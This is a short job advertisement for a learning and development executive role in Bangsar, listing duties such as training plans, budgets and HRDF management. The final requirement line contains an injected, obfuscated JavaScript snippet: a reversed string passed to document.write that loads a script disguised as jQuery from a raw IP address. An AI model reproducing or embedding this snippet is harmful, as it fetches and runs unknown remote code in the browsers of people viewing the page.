Location: Menara TM, Bangsar
Salary : Max RM 5.5k
1. Identify competency based learning needs through surveys and discussions with Departmental Managers, supervisors and employees.
2. Establish an annual learning plan for the company, in consultancy with the CHC GM, Talent Development Heads, Division and Department Heads.
3. Establish a learning calendar and manage learning and development budget as well as approval process in consultation with all relevant stakeholders.
4. Source for relevant programmes as development interventions and manage internal as well as external learning providers.
5. Manage programme & resource requirement prior to training and conduct learning assessment as well as provide reports on learning assessment.
6. Ensure that the learning and development Standard Operating Policy and Procedure is being adhered to.
7. Ensure relevant learning and development documents i.e. application forms, registration, approvals, memos, certificates, handouts etc. are being managed for audit and other references.
• Minimum a Bachelor’s Degree with a Human Resource Development or Human Resource Management or any relevant field.
• Minimum 5 years experience in the field of competency management, training & development.
• Experience in managing training calendar, budget and assessment.
• Experience in other HR related functions i.e. staffing, engagement, ER
• Sound knowledge in the Malaysian Employment Act
• Experience in managing the HRDF under PSMB document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))